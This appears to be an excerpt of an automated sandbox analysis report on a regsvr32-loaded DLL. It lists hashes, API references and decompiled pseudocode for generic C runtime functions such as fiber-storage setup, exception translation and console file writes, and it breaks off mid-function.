Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007E8C Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 0000000180007E9D
FlsSetValue.KERNEL32 ref: 0000000180007EBC
FlsSetValue.KERNEL32 ref: 0000000180007EE4
FlsSetValue.KERNEL32 ref: 0000000180007EF5
FlsSetValue.KERNEL32 ref: 0000000180007F06

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003800 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 68%

			E00000001180003800(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
				void* _t19;
				void* _t27;
				void* _t36;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t46;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;

				_t27 = _t45;
				 *((long long*)(_t27 + 0x20)) = __rbx;
				 *((long long*)(_t27 + 0x18)) = __r8;
				 *((long long*)(_t27 + 0x10)) = __rdx;
				_t43 = _t27 - 0x3f;
				_t46 = _t45 - 0xc0;
				if ( *__rcx == 0x80000003) goto 0x800038a4;
				E00000001180002D40(_t27);
				r12d =  *((intOrPtr*)(_t43 + 0x6f));
				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0x800038bf;
				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
				E00000001180002D40(_t27);
				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0x800038bf;
				if ( *__rcx == 0xe0434f4d) goto 0x800038bf;
				r13d =  *((intOrPtr*)(_t43 + 0x77));
				if ( *__rcx == 0xe0434352) goto 0x800038c3;
				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
				_t19 = E00000001180001F20(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
				if (_t19 == 0) goto 0x800038c3;
				return _t19;
			}

0x180003800
0x180003803
0x180003807
0x18000380b
0x18000381a
0x18000381e
0x180003834
0x180003836
0x18000383b
0x180003848
0x18000384c
0x180003855
0x18000385e
0x180003867
0x180003870
0x180003874
0x180003884
0x18000388c
0x180003891
0x180003896
0x18000389b
0x1800038a2
0x1800038be

APIs

EncodePointer.KERNEL32 ref: 000000018000384C
_CallSETranslator.LIBVCRUNTIME ref: 000000018000389B

Strings

MOC, xrefs: 0000000180003860
RCC, xrefs: 0000000180003869

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction ID: 9ead3bcba03cb9e88f6155f8408b2a39bbeb34ce68d687e28d60bbf843815124
Opcode Fuzzy Hash: 850d6d426b32ca2bcc659c65f0611ee9095a757703c065d3c36d87525356093f
Instruction Fuzzy Hash: 74613A36A04B888AEB62CF66D4413DD77A4F748B88F148216EF4917B99CF78D299C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D5B8 Relevance: 6.3, APIs: 4, Instructions: 299
fileCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E0000000118000D5B8(void* __eax, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t183;
				signed int _t187;
				signed int _t194;
				signed int _t199;
				intOrPtr _t208;
				void* _t210;
				signed char _t211;
				void* _t261;
				signed long long _t262;
				long long _t267;
				long long _t269;
				void* _t270;
				long long _t272;
				intOrPtr* _t278;
				intOrPtr* _t285;
				long long _t287;
				long long _t313;
				void* _t321;
				long long _t322;
				void* _t323;
				long long _t324;
				long long _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				signed long long _t333;
				intOrPtr _t336;
				intOrPtr _t339;
				void* _t341;
				signed long long _t343;
				signed long long _t345;
				long long _t354;
				void* _t358;
				long long _t359;
				signed long long _t362;
				char _t363;
				signed long long _t364;
				void* _t367;
				signed char* _t368;
				signed long long _t370;

				_t261 = _t332;
				_t331 = _t261 - 0x57;
				_t333 = _t332 - 0xd0;
				 *((long long*)(_t331 - 9)) = 0xfffffffe;
				 *((long long*)(_t261 + 8)) = __rbx;
				_t262 =  *0x80021010; // 0xfdf94ef470f2
				 *(_t331 + 0x17) = _t262 ^ _t333;
				 *((long long*)(_t331 - 0x41)) = __r8;
				_t278 = __rcx;
				 *((long long*)(_t331 - 0x59)) =  *((intOrPtr*)(_t331 + 0x7f));
				_t362 = __edx >> 6;
				 *(_t331 - 0x39) = _t362;
				_t370 = __edx + __edx * 8;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + 0x28 + _t370 * 8));
				 *((long long*)(_t331 - 0x19)) = _t267;
				r12d = r9d;
				_t359 = _t358 + __r8;
				 *((long long*)(_t331 - 0x61)) = _t359;
				 *((intOrPtr*)(_t331 - 0x49)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x28)) != dil) goto 0x8000d658;
				0x80006f60();
				_t208 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t331 - 0x59)) + 0x18)) + 0xc));
				 *((intOrPtr*)(_t331 - 0x45)) = _t208;
				 *((long long*)(__rcx)) = _t267;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if ( *((intOrPtr*)(_t331 - 0x41)) - _t359 >= 0) goto 0x8000da03;
				_t343 = __edx >> 6;
				 *(_t331 - 0x11) = _t343;
				 *((char*)(_t331 - 0x71)) =  *((intOrPtr*)(__r8));
				 *((intOrPtr*)(_t331 - 0x6d)) = 0;
				r12d = 1;
				if (_t208 != 0xfde9) goto 0x8000d81d;
				_t285 = 0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8));
				if ( *_t285 == dil) goto 0x8000d6ca;
				_t367 = _t324 + 1;
				if (_t367 - 5 < 0) goto 0x8000d6b7;
				if (_t367 <= 0) goto 0x8000d7b3;
				r12d =  *((char*)(_t285 + 0x1800218d1));
				r12d = r12d + 1;
				_t183 = r12d - 1;
				 *((intOrPtr*)(_t331 - 0x51)) = _t183;
				_t336 = _t183;
				if (_t336 -  *((intOrPtr*)(_t331 - 0x61)) - __r8 > 0) goto 0x8000d980;
				_t287 = _t324;
				 *((char*)(_t331 + _t287 - 1)) =  *((intOrPtr*)(0x3e + _t370 * 8 +  *((intOrPtr*)(0x180000000 + 0x227f0 + _t343 * 8))));
				if (_t287 + 1 - _t367 < 0) goto 0x8000d71b;
				if (_t336 <= 0) goto 0x8000d74b;
				0x80004b30();
				_t354 =  *((intOrPtr*)(_t331 - 0x59));
				_t313 = _t324;
				 *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t362 * 8)) + _t313 + 0x3e + _t370 * 8)) = dil;
				if (_t313 + 1 - _t367 < 0) goto 0x8000d74e;
				 *((long long*)(_t331 - 0x31)) = _t324;
				_t269 = _t331 - 1;
				 *((long long*)(_t331 - 0x29)) = _t269;
				_t187 = (0 | r12d == 0x00000004) + 1;
				r12d = _t187;
				r8d = _t187;
				 *((long long*)(_t333 + 0x20)) = _t354;
				E0000000118000E384(_t269, __rcx, _t331 - 0x6d, _t331 - 0x29, _t336, _t331 - 0x31);
				if (_t269 == 0xffffffff) goto 0x8000da03;
				_t326 = __r8 +  *((intOrPtr*)(_t331 - 0x51)) - 1;
				goto 0x8000d8ae;
				_t363 =  *((char*)(_t269 + 0x1800218d0));
				_t210 = _t363 + 1;
				_t270 = _t210;
				if (_t270 -  *((intOrPtr*)(_t331 - 0x61)) - _t326 > 0) goto 0x8000d9ae;
				 *((long long*)(_t331 - 0x51)) = _t324;
				 *((long long*)(_t331 - 0x21)) = _t326;
				_t194 = (0 | _t210 == 0x00000004) + 1;
				r14d = _t194;
				r8d = _t194;
				 *((long long*)(_t333 + 0x20)) = _t354;
				_t345 = _t331 - 0x51;
				E0000000118000E384(_t270, _t278, _t331 - 0x6d, _t331 - 0x21,  *((intOrPtr*)(_t331 - 0x61)) - _t326, _t345);
				if (_t270 == 0xffffffff) goto 0x8000da03;
				_t327 = _t326 + _t363;
				r12d = r14d;
				_t364 =  *(_t331 - 0x39);
				goto 0x8000d8ae;
				_t339 =  *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8));
				_t211 =  *(_t339 + 0x3d + _t370 * 8);
				if ((_t211 & 0x00000004) == 0) goto 0x8000d850;
				 *((char*)(_t331 + 7)) =  *((intOrPtr*)(_t339 + 0x3e + _t370 * 8));
				 *((char*)(_t331 + 8)) =  *_t327;
				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

0x18000d5b8
0x18000d5c6
0x18000d5ca
0x18000d5d1
0x18000d5d9
0x18000d5dd
0x18000d5e7
0x18000d5ee
0x18000d5f5
0x18000d5fc
0x18000d606
0x18000d60a
0x18000d618
0x18000d624
0x18000d629
0x18000d62d
0x18000d630
0x18000d633
0x18000d63d
0x18000d64a
0x18000d64f
0x18000d65c
0x18000d65f
0x18000d664
0x18000d667
0x18000d66e
0x18000d677
0x18000d67b
0x18000d683
0x18000d686
0x18000d689
0x18000d69c
0x18000d6af
0x18000d6ba
0x18000d6be
0x18000d6c8
0x18000d6cd
0x18000d6e1
0x18000d6ea
0x18000d6f0
0x18000d6f2
0x18000d6fc
0x18000d702
0x18000d708
0x18000d71d
0x18000d72a
0x18000d72f
0x18000d73b
0x18000d740
0x18000d74b
0x18000d759
0x18000d764
0x18000d766
0x18000d76a
0x18000d76e
0x18000d77b
0x18000d77d
0x18000d780
0x18000d783
0x18000d794
0x18000d79d
0x18000d7ab
0x18000d7ae
0x18000d7b6
0x18000d7bf
0x18000d7ca
0x18000d7d0
0x18000d7d6
0x18000d7da
0x18000d7e6
0x18000d7e8
0x18000d7eb
0x18000d7ee
0x18000d7f3
0x18000d7ff
0x18000d808
0x18000d80e
0x18000d811
0x18000d814
0x18000d818
0x18000d81d
0x18000d825
0x18000d82d
0x18000d834
0x18000d839
0x18000d83f
0x18000d844
0x18000d84e
0x18000d850
0x18000d860
0x18000d862
0x18000d86a
0x18000d873
0x18000d888
0x18000d88e
0x18000d891
0x18000d8a0
0x18000d8a8
0x18000d8ae
0x18000d8b1
0x18000d8b6
0x18000d8bb
0x18000d8c3
0x18000d8c7
0x18000d8cc
0x18000d8cf
0x18000d8d8
0x18000d8dd
0x18000d8e2
0x18000d8e8
0x18000d8f1
0x18000d907
0x18000d915
0x18000d91c
0x18000d926
0x18000d92d
0x18000d931
0x18000d93a
0x18000d93a
0x18000d93e
0x18000d94d
0x18000d957
0x18000d95d
0x18000d960
0x18000d96a
0x18000d97b
0x18000d983
0x18000d985
0x18000d997
0x18000d9a7
0x18000d9a9
0x18000d9ac
0x18000d9b1
0x18000d9b3
0x18000d9c8
0x18000d9cf
0x18000d9d8
0x18000d9da
0x18000d9de
0x18000d9e0
0x18000d9ed
0x18000d9f3
0x18000d9f6
0x18000d9f9
0x18000da01
0x18000da2c

APIs

GetConsoleOutputCP.KERNEL32 ref: 000000018000D637
WriteFile.KERNEL32 ref: 000000018000D8FF
WriteFile.KERNEL32 ref: 000000018000D945
GetLastError.KERNEL32 ref: 000000018000D9FB

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}

0x18000dee0
0x18000dee0
0x18000def6
0x18000defc
0x18000deff
0x18000df05
0x18000df0e
0x18000df10
0x18000df15
0x18000df18
0x18000df1e
0x18000df25
0x18000df2d
0x18000df30
0x18000df35
0x18000df3a
0x18000df42
0x18000df57
0x18000df5b
0x18000df5f
0x18000df67
0x18000df6c
0x18000df73
0x18000df7c
0x18000df84
0x18000df8b
0x18000df8b
0x18000df8f
0x18000df97
0x18000dfa9
0x18000dfb8
0x18000dfc2
0x18000dfc7
0x18000dfde
0x18000dfe0
0x18000dfe9
0x18000e004
0x18000e00a
0x18000e00e
0x18000e010
0x18000e019
0x18000e01e
0x18000e024
0x18000e028
0x18000e02c
0x18000e032
0x18000e034
0x18000e03f
0x18000e043
0x18000e048
0x18000e04f
0x18000e051
0x18000e055
0x18000e05d
0x18000e071
0x18000e073
0x18000e076
0x18000e083
0x18000e085
0x18000e08d
0x18000e090
0x18000e094
0x18000e099
0x18000e09c
0x18000e0ab
0x18000e0b0
0x18000e0b7
0x18000e0cc
0x18000e0ce
0x18000e0d2
0x18000e0d4
0x18000e0d9
0x18000e0de
0x18000e0e4
0x18000e0f1
0x18000e0f6
0x18000e0f8
0x18000e105
0x18000e10a
0x18000e10c
0x18000e119
0x18000e11e
0x18000e12b
0x18000e12e
0x18000e136
0x18000e13a
0x18000e145
0x18000e147
0x18000e14d
0x18000e153
0x18000e158
0x18000e16e
0x18000e170
0x18000e175
0x18000e17a
0x18000e17c
0x18000e180
0x18000e187
0x18000e18b
0x18000e18e
0x18000e196
0x18000e199
0x18000e19e
0x18000e1ad
0x18000e1b2
0x18000e1b4
0x18000e1b8
0x18000e1bc
0x18000e1c3
0x18000e1c7
0x18000e1d1
0x18000e1e5

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xfdf94ef470f2
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
